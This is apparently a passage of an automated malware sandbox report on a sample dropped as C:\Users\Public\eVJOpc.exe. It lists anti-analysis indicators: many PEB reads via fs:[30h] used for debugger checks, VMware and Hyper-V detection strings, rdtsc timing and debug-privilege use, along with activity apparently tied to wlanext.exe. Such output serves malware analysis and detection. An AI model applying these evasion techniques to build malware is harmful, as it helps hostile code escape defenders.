            Source: powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmpBinary or memory string: ,f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
            Source: explorer.exe, 0000000A.00000000.424269138.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
            Source: powershell.exe, 00000001.00000002.365400070.00000000080D2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: explorer.exe, 0000000A.00000000.382413657.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_10007AC0 tgisdk,GetProcessHeap,RtlAllocateHeap,memset,VirtualProtect,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_004088E0 rdtsc
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_1000B40A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_1000B70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_1000B61E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_1000B74C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_1000B6CF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B890AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B49080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B440E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B458EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BDB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BDB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C02073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C11074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C14015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B60050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B761A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B72990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BD41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C049A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B64120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B64120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B49100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B72AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B72ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B84A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C18A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B45210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B45210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B63A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B58A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B8927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BFB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BD4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B49240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B74BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B72397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B51B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BFD380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C15BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C18B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B73B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C18CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C014FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C1740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C1740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C1740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BDC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BDC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B71DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B71DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B71DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B735A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B72581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B72581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B72581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B72581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BF8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C105AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C105AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BCA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B74D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B74D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B74D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B67D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C18D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B83D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BF3D40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C18ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BDFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B716E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B576E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C10EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C10EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C10EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B736CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BFFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B88EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BFFE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B4C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B78E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C01608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B58794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BC7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B837F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B44F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B44F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B6F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C18F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BDFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BDFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C1070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C1070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03303B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03303B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032DDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D7B70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032EF370 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032EF370 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032EF370 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03303B5A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03303B5A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03303B5A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03303B5A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032DDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032DF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A9BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A8BB6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03391BA8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03304BAD mov eax, dword ptr fs:[00000030h]
